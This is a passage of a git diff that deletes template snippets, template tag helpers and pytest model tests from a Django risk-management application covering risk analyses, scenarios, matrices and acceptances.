    \ No newline at end of file diff --git a/core/templates/snippets/mtg_style.html b/core/templates/snippets/mtg_style.html deleted file mode 100644 index eba49be..0000000 --- a/core/templates/snippets/mtg_style.html +++ /dev/null @@ -1,9 +0,0 @@ -{% if security_measure.status == 'open' %} -bg-blue-300 text-black -{% endif %} -{% if security_measure.status == 'in_progress' %} -bg-orange-300 text-black -{% endif %} -{% if security_measure.status == 'on_hold' %} -bg-red-400 text-black -{% endif %} \ No newline at end of file diff --git a/core/templates/snippets/my_svgs.html b/core/templates/snippets/my_svgs.html deleted file mode 100644 index 0720580..0000000 --- a/core/templates/snippets/my_svgs.html +++ /dev/null @@ -1,25 +0,0 @@ -{% if name == 'wip' %} -
    - - - - - - -
    -{% endif %} - -{% if name == 'ready' %} -
    - - - -
    -{% endif %} \ No newline at end of file diff --git a/core/templates/snippets/paginator.html b/core/templates/snippets/paginator.html deleted file mode 100644 index 3146708..0000000 --- a/core/templates/snippets/paginator.html +++ /dev/null @@ -1,28 +0,0 @@ -{% load i18n %} -
    - {% if page_obj.paginator.num_pages > 1 %} - - {% trans "Showing Page" %} {{ page_obj.number }} {% trans "of" %} {{ page_obj.paginator.num_pages }} - - {% endif %} -
    - - {% if page_obj.has_previous %} - - {% trans "First" %} - - {% trans "Prev" %} - {% endif %} - - {% if page_obj.has_next %} - - - {% trans "Last" %} - {% endif %} - -
    -
    \ No newline at end of file diff --git a/core/templates/snippets/project_list_nested.html b/core/templates/snippets/project_list_nested.html deleted file mode 100644 index 5ad4ff8..0000000 --- a/core/templates/snippets/project_list_nested.html +++ /dev/null @@ -1,50 +0,0 @@ -{% load i18n %} -{% load static tailwind_tags %} - - - - - - - - - {% for project in projects %}{% if project.folder == domain %} - - - - - - {% endif %} - {% empty %} - - - - {% endfor %} - -
    - {% trans "Name" %} - - {% trans "Description" %} - - {% trans "Status" %} -
    - - -

    - {% if project.description %}{{ project.description|linebreaksbr }}{% else %}--{% endif %} -

    -
    -

    - {{ project.get_lc_status_display }} -

    -
    - -

    {% trans "No project found." %}

    -
    diff --git a/core/templates/snippets/ra_data.html b/core/templates/snippets/ra_data.html deleted file mode 100644 index bd8ed42..0000000 --- a/core/templates/snippets/ra_data.html +++ /dev/null @@ -1,68 +0,0 @@ -{% load i18n %} - -
    - -
    -
    - {% if object_ids_change %} - - - {% trans "Edit" %} - {% endif %} -
    -
    {% trans "Risk analysis" %}
    -
    {{ analysis }}
    -
    -
    -
      -
    • {% trans "Audited by:" %} {{ analysis.auditor }}
    • -
    • {% trans "Status:" %} {% if analysis.is_draft %} - {% trans "Draft" %} {% else %} {% trans "Ready" %} {% endif %} -
    • -
    • {% trans "Created at:" %} {{ analysis.created_at|date }}
    • -
    • {% trans "Updated at:" %} {{ analysis.updated_at|date }}
    • -
    -
    -
    -
    -
    {% trans "Matrix:" %} {{ analysis.rating_matrix }} -
    -
    -
    {% trans "Description" %} :
    -
    {{ analysis.description|linebreaksbr }}
    -
    - -
    -
    - -
    -
    {% trans "Risk scenarios" %} ({{ context|length }})
    - {% include 'snippets/ri_list_nested.html' %} -
    - -
    -
    {% trans "Matrix view" %}
    -
    -
    -

    {% trans "Current" %}

    - {% if pdf %} - {% include 'snippets/risk_matrix.html' with enriched_data=ri_clusters.current %} - {% else %} - {% include 'snippets/risk_matrix.html' with data=ri_clusters.current %} - {% endif %} -
    -
    -

    {% trans "Residual" %}

    - {% if pdf %} - {% include 'snippets/risk_matrix.html' with enriched_data=ri_clusters.residual %} - {% else %} - {% include 'snippets/risk_matrix.html' with data=ri_clusters.residual %} - {% endif %} -
    - - -
    - -
    - -
    \ No newline at end of file diff --git a/core/templates/snippets/ra_list_nested.html b/core/templates/snippets/ra_list_nested.html deleted file mode 100644 index af8bb59..0000000 --- a/core/templates/snippets/ra_list_nested.html +++ /dev/null @@ -1,69 +0,0 @@ -{% load i18n %} -{% load static tailwind_tags %} - - - - - - - - - - - {% for analysis in analyses %} - - - - - - - - {% empty %} - - - - {% endfor %} - -
    - {% trans "ID" %} - - {% trans "Auditor" %} - - {% trans "Risk scenarios" %} - - {% trans "Rating matrix" %} - - {% trans "Last Update" %} -
    -
    - {% if analysis.is_draft %} - {% trans "draft" %} - {% else %} - {% trans "ready" %} - {% endif %} -
    -

    - {{ analysis }} -

    -
    -
    -
    -

    - {% if analysis.auditor %}{{ analysis.auditor }}{% else %}--{% endif %} -

    -
    -

    - {{ analysis.get_scenario_count }} -

    -
    -

    - {{ analysis.rating_matrix|capfirst }} -

    -
    -

    - {{ analysis.updated_at|date }} -

    -
    - -

    {% trans "No analysis found." %}

    -
    diff --git a/core/templates/snippets/radar_chart.html b/core/templates/snippets/radar_chart.html deleted file mode 100644 index 20d268a..0000000 --- a/core/templates/snippets/radar_chart.html +++ /dev/null @@ -1,46 +0,0 @@ -
    - \ No newline at end of file diff --git a/core/templates/snippets/ri_list_nested.html b/core/templates/snippets/ri_list_nested.html deleted file mode 100644 index a1eaf5b..0000000 --- a/core/templates/snippets/ri_list_nested.html +++ /dev/null @@ -1,89 +0,0 @@ -{% load i18n %} -{% load static tailwind_tags %} - - - - - - - - - - - - - - {% for scenario in scenarios %} - - - - - - - - - - - {% empty %} - - - - {% endfor %} - -
    - {% trans "ID" %} - - {% trans "Name" %} - - {% trans "Threat" %} - - {% trans "Existing measures" %} - - {% trans "Current risk level" %} - - {% trans "Residual risk level" %} - - {% trans "Status" %} - - {% trans "Suggested measures" %} -
    - {{ scenario.rid }} - -
    - -
    -

    - {{ scenario.name }} -

    -
    -
    -
    -

    - {% if scenario.threat %}{{ scenario.threat }}{% else %}--{% endif %} -

    -
    -

    {{ scenario.existing_measures|linebreaksbr }}

    -
    -

    - {{ scenario.get_current_risk.name }} -

    -
    - {{ scenario.get_residual_risk.name }} - - {{ scenario.get_treatment_display }} - -
      - {% for measure in scenario.security_measures.all %} -
    • - - {{ measure }} - -
    • - {% endfor %} -
    -
    - -

    {% trans "No scenario found." %}

    -
    \ No newline at end of file diff --git a/core/templates/snippets/risk_matrix.html b/core/templates/snippets/risk_matrix.html deleted file mode 100644 index 48977a3..0000000 --- a/core/templates/snippets/risk_matrix.html +++ /dev/null @@ -1,106 +0,0 @@ -{% load i18n core_extras %} - -
    -{% if data %} -
    - - - {% for row in matrix.render_grid_as_colors reversed %} - {% with row_index=forloop.revcounter0 %} - - - {% for item in row %} - - {% endfor %} - - {% endwith %} - {% endfor %} - - - {% for probability in matrix.parse_json.probability %} - - {% endfor %} - -
    - {% with probability=matrix.parse_json.probability|index:row_index %} - {{ probability.name }} - {% endwith %} - - {{ data|index:row_index|index:forloop.counter0|join:", " }} -
    - {{ probability.name }} -
    -
    -
    -

    {% trans "Impact" %}

    -
    -{% else %} -
    -
    - - - {% for row in matrix.render_grid_as_colors reversed %} - {% with row_index=forloop.revcounter0 %} - - - {% if enriched_data %} - {% for item in row %} - - {% endfor %} - {% else %} - {% for item in row %} - - {% endfor %} - {% endif %} - - - {% endwith %} - {% endfor %} - - - {% for impact in matrix.parse_json.impact %} - - {% endfor %} - -
    - {% with probability=matrix.parse_json.probability|index:row_index %} - {{ probability.name }}: - {{ probability.description|linebreaksbr }} - {% endwith %} - - {{ enriched_data|index:row_index|index:forloop.counter0|join:", " }} - -
    - {{ impact.name }}: - {{ impact.description|linebreaksbr }} -
    -
    -
    - {% trans "Impact" %} -
    -
    -
    -

    {% trans "Risk levels" %}

    -
    - - {% for risk in matrix.parse_json.risk %} - - - - - - {% endfor %} -
    - - {{ risk.name }} - - {{ risk.description|linebreaksbr }} -
    -
    -
    -{% endif %} -
    \ No newline at end of file diff --git a/core/templates/snippets/rose_chart.html b/core/templates/snippets/rose_chart.html deleted file mode 100644 index 8d1f7b8..0000000 --- a/core/templates/snippets/rose_chart.html +++ /dev/null @@ -1,63 +0,0 @@ -
    - \ No newline at end of file diff --git a/core/templates/snippets/treatment_progress_dual_bar.html b/core/templates/snippets/treatment_progress_dual_bar.html deleted file mode 100644 index 66b7f80..0000000 --- a/core/templates/snippets/treatment_progress_dual_bar.html +++ /dev/null @@ -1,167 +0,0 @@ -{% load i18n %} -
    - \ No newline at end of file diff --git a/core/templates/snippets/update_button_modal.html b/core/templates/snippets/update_button_modal.html deleted file mode 100644 index 00cc19b..0000000 --- a/core/templates/snippets/update_button_modal.html +++ /dev/null @@ -1,11 +0,0 @@ -{% load i18n static %} - -
    - - - {{ content }} - - {% include "snippets/modal/modal.html" with modal_action="update" %} -
    \ No newline at end of file diff --git a/core/templates/snippets/users_list_nested.html b/core/templates/snippets/users_list_nested.html deleted file mode 100644 index 459f601..0000000 --- a/core/templates/snippets/users_list_nested.html +++ /dev/null @@ -1,54 +0,0 @@ -{% load i18n %} -{% load static tailwind_tags %} - - - - - - - - - {% for user in users|dictsort:"last_name" %} - - - - - - {% empty %} - - - - {% endfor %} - -
    - {% trans "Username" %} - - {% trans "Full Name" %} - - {% trans "Email" %} -
    -
    - {% if not user.is_active %} - {% trans "inactive" %} - {% endif %} - {% if user.is_superuser %} - {% trans "superuser" %} - {% endif %} -
    -

    - {{ user.get_username }} -

    -
    -
    -
    -

    - {{ user.get_full_name}} -

    -
    -

    - {{ user.email }} -

    -
    - -

    {% trans "No user found." %}

    -
    \ No newline at end of file diff --git a/core/templates/snippets/view_edit.html b/core/templates/snippets/view_edit.html deleted file mode 100644 index 4ffba7a..0000000 --- a/core/templates/snippets/view_edit.html +++ /dev/null @@ -1,12 +0,0 @@ -{% if item.obj_type == 'analysis' %} - | - -{% elif item.obj_type == 'riskscenario' %} - | - -{% elif item.obj_type == 'securitymeasure' %} - | - -{% elif item.obj_type == 'riskacceptance' %} - | -{% endif %} \ No newline at end of file diff --git a/core/templatetags/__init__.py b/core/templatetags/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/core/templatetags/core_extras.py b/core/templatetags/core_extras.py deleted file mode 100644 index 24bf162..0000000 --- a/core/templatetags/core_extras.py +++ /dev/null @@ -1,34 +0,0 @@ -from django import template - -from mira.settings import VERSION, BUILD, DEBUG -from core.utils import COUNTRY_FLAGS, LANGUAGES - -register = template.Library() - -@register.simple_tag() -def mira_version(): - return VERSION - -@register.simple_tag() -def mira_build(): - return f'{BUILD} (dev)' if DEBUG else BUILD - -@register.filter('class') -def _class(obj): - return obj.__class__.__name__ if obj else '' - -@register.filter -def index(List, i): - return List[int(i)] - -@register.filter -def entry_num_array(List): - return range(len(List)) - -@register.filter('country_flag') -def country_flag(country_code): - return COUNTRY_FLAGS.get(country_code, '🌐') - -@register.filter('language_name') -def country_name(country_code): - return LANGUAGES.get(country_code, 'Unknown') \ No newline at end of file diff --git a/core/templatetags/forms_extras.py b/core/templatetags/forms_extras.py deleted file mode 100644 index 69e1e86..0000000 --- a/core/templatetags/forms_extras.py +++ /dev/null @@ -1,39 +0,0 @@ -from django import template - -register = template.Library() - - -@register.filter -def selected_option_index(optgroups: list) -> int: - """ - Returns the index of the selected option in the given optgroups. - - Args: - optgroups: the optgroups to check - - Returns: - The index of the selected option in the given optgroups - """ - for option_tuple in optgroups: - for option in enumerate(option_tuple[1]): - if option[1]['selected']: - return option[1]['index'] - return 0 - - -@register.filter -def selected_option_label(optgroups: list) -> str: - """ - Returns the label of the selected option in the given optgroups. - - Args: - optgroups: the optgroups to check - - Returns: - The label of the selected option in the given optgroups - """ - for option_tuple in optgroups: - for option in enumerate(option_tuple[1]): - if option[1]['selected']: - return option[1]['label'] - return '' \ No newline at end of file diff --git a/core/tests/__init__.py b/core/tests/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/core/tests/test_helpers.py b/core/tests/test_helpers.py deleted file mode 100644 index 658a015..0000000 --- a/core/tests/test_helpers.py +++ /dev/null @@ -1,126 +0,0 @@ -from core.models import * -from core.helpers import * -from iam.models import * -from library.utils import * -from django.utils.translation import gettext_lazy as _ -from django.db.models import Count -import pytest - - -@pytest.fixture -def matrix_fixture(): - Folder.objects.create( - name="Global", content_type=Folder.ContentType.ROOT, builtin=True) - import_library(get_library('Critical matrix 5x5')) - - -@pytest.mark.django_db -def test_get_rating_options_no_matrix(): - root_folder = Folder.objects.create( - name='Global', content_type=Folder.ContentType.ROOT, builtin=True) - user = User.objects.create(email='test@test.com', password='test') - assert get_rating_options(user) == [] - - -@pytest.mark.usefixtures('matrix_fixture') -@pytest.mark.django_db -def test_get_rating_options_no_perm_to_view_matrix(matrix_fixture): - user = User.objects.create(email='test@test.com', password='test') - assert get_rating_options(user) == [] - - -@pytest.mark.usefixtures('matrix_fixture') -@pytest.mark.django_db -def test_get_rating_options_perm_to_view_matrix(): - user = User.objects.create(email='test@test.com', password='test') - folder = Folder.objects.create(name='test', content_type=Folder.ContentType.DOMAIN, builtin=False, - parent_folder=Folder.objects.get(content_type=Folder.ContentType.ROOT)) - project = Project.objects.create(name='test', folder=folder) - analysis = Analysis.objects.create(name='test', project=project, rating_matrix=RiskMatrix.objects.latest('created_at')) - RiskScenario.objects.create(name='test', analysis=analysis, threat=Threat.objects.create(name='test', folder=Folder.objects.get(content_type=Folder.ContentType.ROOT))) - role = Role.objects.create(name='test') - auditor_permissions = Permission.objects.filter(codename__in=[ - "view_project", - "view_analysis", - "view_securitymeasure", - "view_riskscenario", - "view_riskacceptance", - "view_asset", - "view_threat", - "view_securityfunction", - "view_folder", - "view_usergroup" - ]) - role.permissions.set(auditor_permissions) - role.save() - role_assignment = RoleAssignment.objects.create( - user=user, - role=role, - folder=folder, - ) - role_assignment.perimeter_folders.add(folder) - role_assignment.save() - - assert get_rating_options(user) == [ - (0, _('Very Low')), - (1, _('Low')), - (2, _('Medium')), - (3, _('High')), - (4, _('Very High')), - ] - - -@pytest.mark.django_db -def test_get_rating_options_abbr_no_matrix(): - root_folder = Folder.objects.create( - name='Global', content_type=Folder.ContentType.ROOT, builtin=True) - user = User.objects.create(email='test@test.com', password='test') - assert get_rating_options_abbr(user) == [] - - -@pytest.mark.usefixtures('matrix_fixture') -@pytest.mark.django_db -def test_get_rating_options_abbr_no_perm_to_view_matrix(matrix_fixture): - user = User.objects.create(email='test@test.com', password='test') - assert get_rating_options_abbr(user) == [] - - -@pytest.mark.usefixtures('matrix_fixture') -@pytest.mark.django_db -def test_get_rating_options_abbr_perm_to_view_matrix(): - user = User.objects.create(email='test@test.com', password='test') - folder = Folder.objects.create(name='test', content_type=Folder.ContentType.DOMAIN, builtin=False, - parent_folder=Folder.objects.get(content_type=Folder.ContentType.ROOT)) - project = Project.objects.create(name='test', folder=folder) - analysis = Analysis.objects.create(name='test', project=project, rating_matrix=RiskMatrix.objects.latest('created_at')) - RiskScenario.objects.create(name='test', analysis=analysis, threat=Threat.objects.create(name='test', folder=Folder.objects.get(content_type=Folder.ContentType.ROOT))) - role = Role.objects.create(name='test') - auditor_permissions = Permission.objects.filter(codename__in=[ - "view_project", - "view_analysis", - "view_securitymeasure", - "view_riskscenario", - "view_riskacceptance", - "view_asset", - "view_threat", - "view_securityfunction", - "view_folder", - "view_usergroup" - ]) - role.permissions.set(auditor_permissions) - role.save() - role_assignment = RoleAssignment.objects.create( - user=user, - role=role, - folder=folder, - ) - role_assignment.perimeter_folders.add(folder) - role_assignment.save() - - assert get_rating_options_abbr(user) == [ - ('VL', _('Very Low')), - ('L', _('Low')), - ('M', _('Medium')), - ('H', _('High')), - ('VH', _('Very High')) - ] diff --git a/core/tests/test_models.py b/core/tests/test_models.py deleted file mode 100644 index 063bd02..0000000 --- a/core/tests/test_models.py +++ /dev/null @@ -1,398 +0,0 @@ -from uuid import UUID -from core.models import * -from core.models import * -from iam.models import * -from library.utils import * -import pytest -from django.contrib.auth import get_user_model - -User = get_user_model() - -@pytest.fixture -def root_folder_fixture(): - Folder.objects.create( - name="Global", content_type=Folder.ContentType.ROOT, builtin=True) - -@pytest.fixture -def matrix_fixture(): - Folder.objects.create( - name="Global", content_type=Folder.ContentType.ROOT, builtin=True) - import_library(get_library('Critical matrix 5x5')) - - -@pytest.mark.django_db -class TestAnalysis: - pytestmark = pytest.mark.django_db - - def test_analysis_parameters(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.create(name="test matrix", description="test matrix description", json_definition="{}", folder=folder) - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - - assert analysis.name == "test analysis" - assert analysis.description == "test analysis description" - assert analysis.project == Project.objects.get(name="test project") - assert analysis.rating_matrix == RiskMatrix.objects.get(name="test matrix") - - def test_analysis_get_scenario_count_null_when_no_scenario_inside_analysis(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.create(name="test matrix", description="test matrix description", json_definition="{}", folder=folder) - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - - assert analysis.get_scenario_count() == 0 - - @pytest.mark.usefixtures("matrix_fixture") - def test_analysis_get_scenario_count_one_when_one_scenario_inside_analysis(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - - assert analysis.get_scenario_count() == 1 - - @pytest.mark.usefixtures("matrix_fixture") - def test_analysis_get_scenario_count_is_decremented_when_child_scenario_is_deleted(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - - assert analysis.get_scenario_count() == 1 - - scenario.delete() - - assert analysis.get_scenario_count() == 0 - - @pytest.mark.usefixtures("matrix_fixture") - def test_analysis_get_scenario_count_is_incremented_when_child_scenario_is_created(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - - assert analysis.get_scenario_count() == 0 - - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - - assert analysis.get_scenario_count() == 1 - - def test_analysis_id_is_of_type_uuid(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.create(name="test matrix", description="test matrix description", json_definition="{}", folder=folder) - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - - assert isinstance(analysis.id, UUID) - - def test_analysis_is_unique_in_project(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.create(name="test matrix", description="test matrix description", json_definition="{}", folder=folder) - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - - with pytest.raises(ValidationError): - Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - - def test_analysis_can_have_same_name_but_different_version(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.create(name="test matrix", description="test matrix description", json_definition="{}", folder=folder) - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix, version="1") - Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix, version="2") - - def test_analysis_can_have_same_name_and_version_in_a_different_project(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.create(name="test matrix", description="test matrix description", json_definition="{}", folder=folder) - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix, version="1") - - project2 = Project.objects.create(name="test project 2", folder=folder) - Analysis.objects.create(name="test analysis", description="test analysis description", - project=project2, rating_matrix=matrix, version="1") - - def test_analysis_scope_is_analyses_in_project(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.create(name="test matrix", description="test matrix description", json_definition="{}", folder=folder) - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - analysis2 = Analysis.objects.create(name="test analysis 2", description="test analysis description", - project=project, rating_matrix=matrix) - analysis3 = Analysis.objects.create(name="test analysis 3", description="test analysis description", - project=project, rating_matrix=matrix) - - project2 = Project.objects.create(name="test project 2", folder=folder) - analysis4 = Analysis.objects.create(name="test analysis 4", description="test analysis description", - project=project2, rating_matrix=matrix) - analysis5 = Analysis.objects.create(name="test analysis 5", description="test analysis description", - project=project2, rating_matrix=matrix) - - - assert list(analysis.get_scope()) == [analysis, analysis2, analysis3] - - - -@pytest.mark.django_db -class TestRiskScenario: - pytestmark = pytest.mark.django_db - - @pytest.mark.usefixtures("matrix_fixture") - def test_risk_scenario_parameters(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - - assert scenario.name == "test scenario" - assert scenario.description == "test scenario description" - assert scenario.analysis == Analysis.objects.get(name="test analysis") - assert scenario.threat == Threat.objects.get(name="test threat") - - @pytest.mark.usefixtures("matrix_fixture") - def test_risk_scenario_parent_project(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - - assert scenario.parent_project() == Project.objects.get(name="test project") - - @pytest.mark.usefixtures("matrix_fixture") - def test_risk_scenario_is_deleted_when_analysis_is_deleted(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - - queryset = RiskScenario.objects.filter(id=scenario.id) - - assert queryset.exists() - - analysis.delete() - - assert not queryset.exists() - - @pytest.mark.usefixtures("matrix_fixture") - def test_risk_scenario_is_deleted_when_threat_is_deleted(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - - queryset = RiskScenario.objects.filter(id=scenario.id) - - assert queryset.exists() - - threat.delete() - - assert not queryset.exists() - - @pytest.mark.usefixtures("matrix_fixture") - def test_risk_scenario_id_is_of_type_uuid(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - - assert isinstance(scenario.id, UUID) - - @pytest.mark.usefixtures("matrix_fixture") - def test_risk_scenario_scope_is_scenarios_in_analysis(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - scenario2 = RiskScenario.objects.create(name="test scenario 2", description="test scenario description", analysis=analysis, - threat=threat) - scenario3 = RiskScenario.objects.create(name="test scenario 3", description="test scenario description", analysis=analysis, - threat=threat) - - analysis2 = Analysis.objects.create(name="test analysis 2", description="test analysis description", - project=project, rating_matrix=matrix) - scenario4 = RiskScenario.objects.create(name="test scenario 4", description="test scenario description", analysis=analysis2, - threat=threat) - scenario5 = RiskScenario.objects.create(name="test scenario 5", description="test scenario description", analysis=analysis2, - threat=threat) - - assert list(scenario.get_scope()) == [scenario, scenario2, scenario3] - - @pytest.mark.usefixtures("matrix_fixture") - def test_risk_scenario_rid_is_deterministic(self): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - scenario2 = RiskScenario.objects.create(name="test scenario 2", description="test scenario description", analysis=analysis, - threat=threat) - scenario3 = RiskScenario.objects.create(name="test scenario 3", description="test scenario description", analysis=analysis, - threat=threat) - - assert scenario.rid == "R.1" - assert scenario2.rid == "R.2" - assert scenario3.rid == "R.3" - - - -@pytest.mark.django_db -class TestRiskMatrix: - pytestmark = pytest.mark.django_db - - ... - - -@pytest.mark.django_db -class TestSecurityMeasure: - pytestmark = pytest.mark.django_db - - ... - - -@pytest.mark.django_db -class TestRiskAcceptance: - pytestmark = pytest.mark.django_db - - def test_acceptance_creation(self, matrix_fixture): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - acceptance = RiskAcceptance.objects.create(name="test acceptance", description="test acceptance description", folder=folder) - acceptance.risk_scenarios.add(scenario) - acceptance.save() - - assert isinstance(acceptance.id, UUID) - assert acceptance.name == "test acceptance" - assert acceptance.description == "test acceptance description" - assert acceptance.folder == folder - assert acceptance.risk_scenarios.count() == 1 - assert acceptance.risk_scenarios.all()[0] == scenario - - def test_acceptance_creation_same_name_different_folder(self, matrix_fixture): - folder = Folder.objects.create(name="test folder", description="test folder description") - folder2 = Folder.objects.create(name="test folder 2", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - acceptance = RiskAcceptance.objects.create(name="test acceptance", description="test acceptance description", folder=folder) - acceptance.risk_scenarios.add(scenario) - acceptance.save() - - acceptance2 = RiskAcceptance.objects.create(name="test acceptance", description="test acceptance description", folder=folder2) - acceptance2.risk_scenarios.add(scenario) - acceptance2.save() - - assert isinstance(acceptance2.id, UUID) - assert acceptance2.name == "test acceptance" - assert acceptance2.description == "test acceptance description" - assert acceptance2.folder == folder2 - assert acceptance2.risk_scenarios.count() == 1 - assert acceptance2.risk_scenarios.all()[0] == scenario - - def test_acceptance_creation_same_name_same_folder(self, matrix_fixture): - folder = Folder.objects.create(name="test folder", description="test folder description") - matrix = RiskMatrix.objects.all()[0] - project = Project.objects.create(name="test project", folder=folder) - analysis = Analysis.objects.create(name="test analysis", description="test analysis description", - project=project, rating_matrix=matrix) - threat = Threat.objects.create(name="test threat", description="test threat description", folder=folder) - scenario = RiskScenario.objects.create(name="test scenario", description="test scenario description", analysis=analysis, - threat=threat) - acceptance = RiskAcceptance.objects.create(name="test acceptance", description="test acceptance description", folder=folder) - acceptance.risk_scenarios.add(scenario) - acceptance.save() - - with pytest.raises(ValidationError): - acceptance2 = RiskAcceptance.objects.create(name="test acceptance", description="test acceptance description", folder=folder) - acceptance2.risk_scenarios.add(scenario) - acceptance2.save() - - - -@pytest.mark.django_db -class TestAsset: - pytestmark = pytest.mark.django_db - - def test_asset_creation(self, root_folder_fixture): - root_folder = Folder.objects.get(content_type=Folder.ContentType.ROOT) - asset = Asset.objects.create(name="Asset", folder=root_folder) - assert asset.name == "Asset" - assert asset.folder == root_folder - assert asset.type == Asset.Type.SUPPORT - - def test_asset_creation_same_name(self, root_folder_fixture): - root_folder = Folder.objects.get(content_type=Folder.ContentType.ROOT) - Asset.objects.create(name="Asset", folder=root_folder) - with pytest.raises(ValidationError): - Asset.objects.create(name="Asset", folder=root_folder) - - def test_asset_creation_same_name_different_folder(self, root_folder_fixture): - root_folder = Folder.objects.get(content_type=Folder.ContentType.ROOT) - folder = Folder.objects.create(name="Parent", folder=root_folder) - - asset1 = Asset.objects.create(name="Asset", folder=root_folder) - asset2 = Asset.objects.create(name="Asset", 